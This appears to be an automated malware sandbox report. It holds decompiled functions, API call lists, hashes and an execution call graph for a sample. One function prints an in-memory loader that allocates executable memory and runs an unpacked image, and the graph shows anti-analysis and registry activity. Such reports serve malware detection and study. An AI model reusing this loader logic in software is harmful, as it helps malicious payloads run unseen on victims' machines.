                        0x00cd1180
                        0x00cd1179
                        0x00cd1192
                        0x00cd1198
                        0x00cd119d
                        0x00000000
                        0x00000000
                        0x00cd11a9
                        0x00cd11af
                        0x00cd11b3
                        0x00cd11b5
                        0x00cd11ba
                        0x00cd11bc
                        0x00cd11bf
                        0x00cd11c1
                        0x00000000
                        0x00cd11c1
                        0x00cd11d1
                        0x00cd11d6
                        0x00cd11e4
                        0x00cd11f2
                        0x00cd11f7
                        0x00cd11f9
                        0x00000000
                        0x00cd11f9
                        0x00cd11fc
                        0x00cd1201
                        0x00cd1206
                        0x00000000
                        0x00cd1206
                        0x00cd11cc

                        APIs
                        • VirtualProtectEx.KERNEL32(000000FF,0000001C,?,00000040,00000000), ref: 00CD1169
                        • VirtualAllocEx.KERNEL32(000000FF,00000000,?,00003000,00000040), ref: 00CD1192
                        • VirtualFreeEx.KERNEL32(000000FF,00000000,00000000,00008000), ref: 00CD11C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.305081884.0000000000CD1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CD0000, based on PE: true
                        • Associated: 00000000.00000002.305067270.0000000000CD0000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.305094573.0000000000CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.305102626.0000000000CF4000.00000040.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cd0000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: Virtual$AllocFreeProtect
                        • String ID:
                        • API String ID: 267585107-0
                        • Opcode ID: 990109e77be4d0b286c64ea921f878dea12f27511afee615773ce33a07c5c212
                        • Instruction ID: 98736292987d57dd134422cc8e7accfa764f62993a026fc40ac91fd432db696e
                        • Opcode Fuzzy Hash: 990109e77be4d0b286c64ea921f878dea12f27511afee615773ce33a07c5c212
                        • Instruction Fuzzy Hash: 0521C775600204BBDB219B65CC41F6EB7F6AB45B20F28475AEB21AB3D0DA70EA04DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00CD16E9 Relevance: 3.1, APIs: 2, Instructions: 55memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E00CD16E9(void* __ebx, void* __ecx, intOrPtr _a4) {
				void* __esi;
				void* _t9;
				int _t12;
				long _t16;
				void* _t21;
				void* _t24;

				_t21 = __ecx;
				if(__ebx == 0 || _a4 == 0) {
					return _t9;
				} else {
					_t28 =  *((intOrPtr*)(__ebx + 0x3c)) + __ebx;
					_t12 = VirtualAllocEx(0xffffffff, 0,  *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x3c)) + __ebx + 0x50)) + 0x20, 0x3000, 0x40); // executed
					_t24 = _t12;
					if(_t24 != 0) {
						E00CD181D(_t21, _t24, __ebx,  *((intOrPtr*)(_t28 + 0x54)));
						E00CD162B(_t28, _t24, __ebx);
						E00CD1863(_t21, __ebx, 0, _a4);
						_t16 = E00CD176E(_t24, _t24);
						if(_t16 != 0) {
							_t12 = E00CD1698(_t21, _t24,  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0x3c)) + _t24 + 0x28)) + _t24); // executed
						} else {
							_t12 = VirtualFreeEx(0xffffffff, _t24, _t16, 0x8000);
						}
					}
					return _t12;
				}
			}









                        0x00cd16e9
                        0x00cd16ee
                        0x00cd176b
                        0x00cd16f6
                        0x00cd16fd
                        0x00cd170f
                        0x00cd1715
                        0x00cd1719
                        0x00cd1720
                        0x00cd1727
                        0x00cd1732
                        0x00cd1739
                        0x00cd1743
                        0x00cd1762
                        0x00cd1745
                        0x00cd174e
                        0x00cd174e
                        0x00cd1743
                        0x00000000
                        0x00cd1769

                        APIs
                        • VirtualAllocEx.KERNEL32(000000FF,00000000,?,00003000,00000040,?,00000000,?,00CD1250,00000000), ref: 00CD170F
                        • VirtualFreeEx.KERNEL32(000000FF,00000000,00000000,00008000), ref: 00CD174E
                        Memory Dump Source
                        • Source File: 00000000.00000002.305081884.0000000000CD1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CD0000, based on PE: true
                        • Associated: 00000000.00000002.305067270.0000000000CD0000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.305094573.0000000000CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.305102626.0000000000CF4000.00000040.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cd0000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: e2d6f7f08057f57509906cacaeb13d490a36df1d81ccfc2748c408537e1ea622
                        • Instruction ID: c1aca07a4f36948bdb5166ba687ac84d02d40d1d48081c0898821ba70d90a8fe
                        • Opcode Fuzzy Hash: e2d6f7f08057f57509906cacaeb13d490a36df1d81ccfc2748c408537e1ea622
                        • Instruction Fuzzy Hash: 1C01F7736003007BE7616A559DC5F7B37ACEB94B24F1D011BFF24A63D1CA60E840A764
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02771FBA Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 57 2771fba-2771fcc LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction ID: 88293d452c237b35b5d788c3fe7e5d6bf4017d7a5827ca68aa0277ca53bbf94f
                        • Opcode Fuzzy Hash: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction Fuzzy Hash: 04B0927008A2C24BC30157200C28AA77B542BA1312B6981AED0C00A55A87684561E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02771BA2 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 55 2771ba2-2771bb4 LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction ID: 6e447e2aab31238f52af9227f51ec9419e211fef2ea0690e6f86d454c0306d03
                        • Opcode Fuzzy Hash: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction Fuzzy Hash: 70B0927008A2825BC342672009388A2BB142BA231176DC0EAD0C00A14A8A584665F3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0277126C Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 53 277126c-277127e LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 833478d482a7b43204bbbe238d27421b16e52cae6c99a7ea0f44efd2c3c9bdf3
                        • Instruction ID: 1ba7af1aba9965ef21294bbc980e45405888e9775d63a3e6e8a890e76fa3ddbe
                        • Opcode Fuzzy Hash: 833478d482a7b43204bbbe238d27421b16e52cae6c99a7ea0f44efd2c3c9bdf3
                        • Instruction Fuzzy Hash: D4B0927044E2818BC342633108298A26B142AAA2203AAC1EED0C40A55AC69C4926DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 027727EA Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 58 27727ea-27727fc LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: aa513a66151f21651e0a99563f16ae0a9e7f015dc53f313c8b3105b8c6a60f41
                        • Instruction ID: 2717141006914902d82831632c63fb57cbdd18c9338ab7ab102fbcc3b9ad98cb
                        • Opcode Fuzzy Hash: aa513a66151f21651e0a99563f16ae0a9e7f015dc53f313c8b3105b8c6a60f41
                        • Instruction Fuzzy Hash: 6AB092B549A2824BC3816720082C9A66B541BE5220B79C0AFD0C40A18ACA5845B5D3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02771CA8 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 56 2771ca8-2771cba LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction ID: 276e05382c44e754f64a631682c2cf0a86faafde1a6fa7e7aeff9baa436309a7
                        • Opcode Fuzzy Hash: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction Fuzzy Hash: 1BB0927008A2D14BC342A3204828AA77B542BA2211B69C0EAD0C02A14A86584625E3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02771996 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 54 2771996-27719a8 LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction ID: e6cd4b975672edc97eaad6a8d3891c608aeb046747e8cb31da1c1ec735a207a7
                        • Opcode Fuzzy Hash: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction Fuzzy Hash: C5B092B008A2C18FC34263204C2ACA37B242EA222136A81EAD0C40B15A865C4939E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02770F5A Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 52 2770f5a-2770f6c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction ID: 13d8455f11edab5e26112e1f76ce15454a3e06d171b0115a56dfd79d7043cd27
                        • Opcode Fuzzy Hash: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction Fuzzy Hash: 75B0927008A2865BC34167200829AA36B552BA1210B6985AED0C00A14B87584675E7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:10.5%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:1
                        Total number of Limit Nodes:0
                        execution_graph 72 e81996 LdrInitializeThunk

                        Callgraph

                        Executed Functions

                        Function 00E81CA8 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2 e81ca8-e81cba LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.306149574.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_e80000_yvneslhpc.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction ID: 276e05382c44e754f64a631682c2cf0a86faafde1a6fa7e7aeff9baa436309a7
                        • Opcode Fuzzy Hash: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction Fuzzy Hash: 1BB0927008A2D14BC342A3204828AA77B542BA2211B69C0EAD0C02A14A86584625E3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00E81BA2 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1 e81ba2-e81bb4 LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.306149574.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_e80000_yvneslhpc.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction ID: 6e447e2aab31238f52af9227f51ec9419e211fef2ea0690e6f86d454c0306d03
                        • Opcode Fuzzy Hash: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction Fuzzy Hash: 70B0927008A2825BC342672009388A2BB142BA231176DC0EAD0C00A14A8A584665F3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00E81FBA Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3 e81fba-e81fcc LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.306149574.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_e80000_yvneslhpc.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction ID: 88293d452c237b35b5d788c3fe7e5d6bf4017d7a5827ca68aa0277ca53bbf94f
                        • Opcode Fuzzy Hash: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction Fuzzy Hash: 04B0927008A2C24BC30157200C28AA77B542BA1312B6981AED0C00A55A87684561E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00E81996 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 e81996-e819a8 LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.306149574.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_e80000_yvneslhpc.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction ID: e6cd4b975672edc97eaad6a8d3891c608aeb046747e8cb31da1c1ec735a207a7
                        • Opcode Fuzzy Hash: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction Fuzzy Hash: C5B092B008A2C18FC34263204C2ACA37B242EA222136A81EAD0C40B15A865C4939E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:14.2%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:14.1%
                        Total number of Nodes:1117
                        Total number of Limit Nodes:131
                        execution_graph 26100 2878b84 18 API calls 24710 2883a8d RegCreateKeyExW RegCloseKey 25039 288489c 25042 28848d5 25039->25042 25041 28848c6 25043 28848ec 25042->25043 25044 28848f7 25043->25044 25048 28661e9 25043->25048 25044->25041 25049 28661f8 25048->25049 25091 2866202 25049->25091 25051 2866200 25051->25044 25052 2884963 25051->25052 25053 288496d 25052->25053 25126 2884c84 25053->25126 25056 288499b RtlAddVectoredExceptionHandler 25057 28849ad 25056->25057 25130 2865774 25057->25130 25060 28849c0 25135 286e06b 25060->25135 25061 28849ee 25062 2884a36 25061->25062 25181 2865b4a 25061->25181 25189 286fc3e 25062->25189 25065 2884a5b 25066 2884a87 25065->25066 25067 288383b 3 API calls 25065->25067 25068 2884aa6 25066->25068 25069 2865e00 3 API calls 25066->25069 25067->25066 25201 2865e00 25068->25201 25069->25068 25071 2884ac6 25218 287fd11 25071->25218 25074 2884aed 25075 2884af6 25074->25075 25221 287f56d 25074->25221 25077 2865e00 3 API calls 25075->25077 25078 2884b0b Sleep 25077->25078 25238 2884bca 25078->25238 25081 2884b23 25247 2884cbc 25081->25247 25083 2884b28 25084 2884b65 25083->25084 25087 2884b3b 25083->25087 25089 2884b63 25084->25089 25278 2880a42 RtlFreeHeap 25084->25278 25086 2884bb8 25086->25044 25258 28707d7 25087->25258 25279 286e4ff RtlFreeHeap 25089->25279 25092 286622b 25091->25092 25110 2885150 25092->25110 25094 286625d 25095 2885150 GetPEB 25094->25095 25096 286626c 25095->25096 25105 2866283 25096->25105 25115 2884f0a 25096->25115 25098 28662a0 25099 2884f0a LdrGetProcedureAddress 25098->25099 25098->25105 25100 28662e2 25099->25100 25101 286630e SetErrorMode 25100->25101 25100->25105 25107 2866325 25101->25107 25102 2866422 25119 28664bf 25102->25119 25103 286171c RtlFreeHeap 25103->25107 25105->25051 25106 2866374 LoadLibraryW 25106->25107 25107->25102 25107->25103 25107->25105 25107->25106 25108 2884f0a LdrGetProcedureAddress 25107->25108 25109 28617e4 RtlFreeHeap 25107->25109 25108->25107 25109->25107 25111 288515d 25110->25111 25112 2885161 25110->25112 25111->25094 25113 28851a9 GetPEB 25112->25113 25114 28851c3 25112->25114 25113->25114 25114->25094 25116 2884f52 25115->25116 25117 2884f1d 25115->25117 25116->25098 25117->25116 25118 2885096 LdrGetProcedureAddress 25117->25118 25118->25117 25120 28664ee 25119->25120 25121 28665f5 LoadLibraryA 25120->25121 25122 286662f LoadLibraryA 25121->25122 25125 2866609 25121->25125 25123 2866656 25122->25123 25124 2866643 GetProcAddress 25122->25124 25123->25105 25124->25123 25125->25122 25128 2884c92 25126->25128 25127 288497a 25127->25056 25127->25057 25128->25127 25280 2862240 RtlFreeHeap 25128->25280 25131 2865778 25130->25131 25132 28617e4 RtlFreeHeap 25131->25132 25134 28657ab 25131->25134 25133 28657df 25132->25133 25133->25060 25134->25060 25136 286e099 25135->25136 25281 286db20 25136->25281 25138 286e0a9 25153 286e0ad 25138->25153 25297 286ddff 25138->25297 25140 286e0e2 25141 286ddff 20 API calls 25140->25141 25143 286e0f0 25140->25143 25141->25143 25152 286e12e 25143->25152 25143->25153 25326 28671eb 25143->25326 25144 286e261 Sleep 25145 286e269 25144->25145 25146 286ddff 20 API calls 25145->25146 25149 286e271 25146->25149 25147 286e192 25147->25144 25147->25145 25147->25153 25150 286ddff 20 API calls 25149->25150 25154 286e27f 25149->25154 25150->25154 25151 286e2b1 25155 286e2d3 NtQueryInformationProcess 25151->25155 25162 286e392 25151->25162 25152->25153 25330 286d4dc 25152->25330 25153->25061 25154->25151 25156 2863d40 3 API calls 25154->25156 25159 286e2f4 25155->25159 25157 286e2a5 25156->25157 25158 2863d40 3 API calls 25157->25158 25158->25151 25342 286ff36 25159->25342 25164 288383b 3 API calls 25162->25164 25167 286e402 25162->25167 25164->25167 25173 286e41b 25167->25173 25385 286e03f 11 API calls 25167->25385 25168 286e45b 25170 286e46c 25168->25170 25387 286e03f 11 API calls 25168->25387 25172 286ddff 20 API calls 25170->25172 25176 286e485 25172->25176 25173->25168 25386 2877d31 16 API calls 25173->25386 25175 286e340 25175->25153 25379 2863145 25175->25379 25176->25153 25178 28884a2 GetFileAttributesW 25176->25178 25178->25153 25182 2865b6e 25181->25182 25824 286397d 25182->25824 25184 2865be5 25184->25062 25185 2865bc8 25185->25184 25186 28617e4 RtlFreeHeap 25185->25186 25186->25184 25188 2865b8e 25188->25184 25188->25185 25835 2865b07 25188->25835 25190 286fc5f 25189->25190 25191 2862ec7 2 API calls 25190->25191 25195 286fc7b 25191->25195 25192 286fd0c 25192->25065 25193 286fd06 25842 28832c7 RtlFreeHeap 25193->25842 25195->25192 25195->25193 25840 288365b RtlFreeHeap 25195->25840 25197 286fcd6 25198 28834cf 5 API calls 25197->25198 25199 286fcfa 25198->25199 25841 2883858 RegCreateKeyExW RegCloseKey GetFileAttributesW 25199->25841 25202 2865e11 25201->25202 25203 2865e15 25201->25203 25202->25071 25203->25202 25206 2866075 25203->25206 25208 2866044 25203->25208 25209 2865f7c CreateThread 25203->25209 25211 2866066 25203->25211 25204 28617e4 RtlFreeHeap 25204->25206 25205 2866084 25206->25205 25207 28617e4 RtlFreeHeap 25206->25207 25207->25205 25210 28617e4 RtlFreeHeap 25208->25210 25209->25208 25212 2865f9b 25209->25212 25210->25211 25211->25204 25211->25206 25212->25211 25213 2866015 25212->25213 25843 2865aa6 25212->25843 25215 2866028 FindCloseChangeNotification 25213->25215 25216 2865aa6 RtlFreeHeap 25213->25216 25215->25211 25216->25215 25848 2866ef4 25218->25848 25222 2863145 2 API calls 25221->25222 25223 287f5ab 25222->25223 25225 287f5d6 25223->25225 25852 286317f 25223->25852 25225->25075 25226 287f5f8 25855 287918e 25226->25855 25228 287f610 25229 287f6c7 25228->25229 25231 287f6bc 25228->25231 25892 287f2c0 RtlFreeHeap 25228->25892 25870 287987c 25229->25870 25232 28617e4 RtlFreeHeap 25231->25232 25232->25229 25233 287f794 25234 28617e4 RtlFreeHeap 25233->25234 25234->25225 25235 287f6e8 25235->25225 25235->25233 25893 287f2c0 RtlFreeHeap 25235->25893 25239 2884be0 25238->25239 25240 2884c08 25239->25240 25242 2884c10 25239->25242 25246 2884c0e 25239->25246 25241 28617e4 RtlFreeHeap 25240->25241 25241->25246 25243 28617e4 RtlFreeHeap 25242->25243 25244 2884c45 25243->25244 25245 28617e4 RtlFreeHeap 25244->25245 25245->25246 25246->25081 25248 2884cca 25247->25248 25250 2884ccf 25247->25250 25905 286ca8c RegCreateKeyExA 25248->25905 25253 2884cf0 25250->25253 25906 2868b9f RtlFreeHeap 25250->25906 25251 2884d58 25251->25083 25253->25251 25254 2884d52 25253->25254 25256 2884d5a 25253->25256 25907 2868c04 RtlFreeHeap RegCreateKeyExW RegCloseKey RegCreateKeyExA GetFileAttributesW 25254->25907 25908 2883cec RtlFreeHeap RegCloseKey 25256->25908 25259 2863145 2 API calls 25258->25259 25261 2870803 25259->25261 25260 287081a 25260->25089 25261->25260 25262 2863145 2 API calls 25261->25262 25263 287084a 25262->25263 25264 2870853 25263->25264 25909 2870d19 25263->25909 25917 28855ff 25264->25917 25269 2870cf4 Sleep 25276 287085d 25269->25276 25271 28617e4 RtlFreeHeap 25271->25276 25276->25269 25276->25271 25277 2885420 RtlFreeHeap 25276->25277 25934 288524a 25276->25934 25948 287a8e1 25276->25948 25955 287a99e 25276->25955 25959 287abcb 25276->25959 25971 287f011 RtlFreeHeap 25276->25971 25277->25276 25279->25086 25280->25127 25282 286db36 25281->25282 25388 286e6a4 25282->25388 25284 286db41 25285 286db5c NtQueryInformationProcess 25284->25285 25296 286db45 25284->25296 25286 286db7a 25285->25286 25393 2865446 25286->25393 25290 286dcb6 25409 286d269 25290->25409 25292 286dcca 25294 286dce2 25292->25294 25413 286d0af 25292->25413 25294->25296 25431 2870623 RtlFreeHeap RegCreateKeyExA RegCloseKey 25294->25431 25296->25138 25298 286de11 25297->25298 25299 286de0c 25297->25299 25301 286de1d 25298->25301 25452 286e9a2 25298->25452 25629 286e93a RtlFreeHeap RegCreateKeyExW RegCloseKey 25299->25629 25305 286de2b 25301->25305 25456 286e9f0 25301->25456 25304 286df04 25304->25140 25305->25304 25308 286de85 25305->25308 25588 2863f33 25305->25588 25307 286de76 25594 287d6b6 25307->25594 25601 2874fb6 25308->25601 25313 286dee5 25313->25304 25619 2884444 25313->25619 25314 286deb2 25314->25313 25630 2875a56 RtlFreeHeap 25314->25630 25316 286dee0 25631 28770c0 RtlFreeHeap RegCloseKey RegCreateKeyExA 25316->25631 25319 286df35 25319->25304 25320 286df49 Sleep 25319->25320 25625 2884512 25320->25625 25323 2884512 PostMessageA 25324 286df80 25323->25324 25325 2884512 PostMessageA 25324->25325 25325->25304 25327 28671fc 25326->25327 25328 2862802 2 API calls 25327->25328 25329 286727a 25327->25329 25328->25329 25329->25152 25331 286d4f9 25330->25331 25340 286d4f2 25330->25340 25331->25340 25758 286d4b9 25331->25758 25333 286d58b 25334 286d4b9 5 API calls 25333->25334 25336 286d5ca 25333->25336 25334->25333 25335 286d741 25766 2877aed 25335->25766 25336->25335 25763 288d99a OpenSCManagerW 25336->25763 25339 286d751 25339->25340 25774 2867a69 25339->25774 25340->25147 25343 286ff5d 25342->25343 25811 2868578 25343->25811 25345 286ff68 25346 2862b90 RegOpenKeyExA 25345->25346 25347 286ffbe 25346->25347 25348 28617e4 RtlFreeHeap 25347->25348 25349 286fff6 25347->25349 25348->25349 25350 2862b90 RegOpenKeyExA 25349->25350 25351 287006f 25350->25351 25352 2862b90 RegOpenKeyExA 25351->25352 25353 28700ae 25352->25353 25354 2862b90 RegOpenKeyExA 25353->25354 25355 287010b 25354->25355 25356 28617e4 RtlFreeHeap 25355->25356 25357 2870175 25355->25357 25356->25357 25358 28617e4 RtlFreeHeap 25357->25358 25359 2870215 25357->25359 25358->25359 25360 28617e4 RtlFreeHeap 25359->25360 25362 2870242 25359->25362 25360->25362 25361 286e31f 25364 286d78a 25361->25364 25362->25361 25363 28617e4 RtlFreeHeap 25362->25363 25363->25361 25367 286d79c 25364->25367 25365 286db19 25365->25153 25375 287039f 25365->25375 25366 286227a RtlFreeHeap 25366->25367 25367->25365 25367->25366 25368 2867fd8 13 API calls 25367->25368 25369 2883c88 RtlFreeHeap RegCreateKeyExA 25367->25369 25371 2867ef8 RtlFreeHeap RegCreateKeyExW RegCloseKey 25367->25371 25372 2863145 2 API calls 25367->25372 25374 28679df RegCreateKeyExW 25367->25374 25816 2883bfe RegCreateKeyExW RegCloseKey 25367->25816 25817 286494b RegCreateKeyExA 25367->25817 25368->25367 25369->25367 25371->25367 25372->25367 25374->25367 25376 28703c1 25375->25376 25377 2863145 2 API calls 25376->25377 25378 28703f7 25376->25378 25377->25378 25378->25175 25380 2862ec7 2 API calls 25379->25380 25381 2863168 25380->25381 25382 2866ed1 25381->25382 25818 2864592 25382->25818 25385->25173 25386->25168 25387->25170 25389 286e6b8 25388->25389 25392 286e744 25389->25392 25432 28651f6 25389->25432 25391 286e720 GetLongPathNameW 25391->25392 25392->25284 25394 2865462 25393->25394 25395 2865472 GetNativeSystemInfo 25394->25395 25396 2865496 25395->25396 25397 286ceba 25396->25397 25398 286cedd 25397->25398 25436 2862b90 RegOpenKeyExA 25398->25436 25400 286cf24 25438 2862802 25400->25438 25402 286cf96 25403 2863145 2 API calls 25402->25403 25404 286cfbd 25403->25404 25442 286531a 25404->25442 25407 2862802 2 API calls 25408 286d016 25407->25408 25408->25290 25410 286d28e 25409->25410 25448 28640d2 25410->25448 25412 286d2ab 25412->25292 25414 286d0d0 25413->25414 25415 2862b90 RegOpenKeyExA 25414->25415 25416 286d169 25415->25416 25417 286d19d 25416->25417 25419 288dc1d GetFileAttributesW 25416->25419 25418 2862b90 RegOpenKeyExA 25417->25418 25420 286d1b4 25418->25420 25419->25417 25422 286d1e8 25420->25422 25423 288dc1d GetFileAttributesW 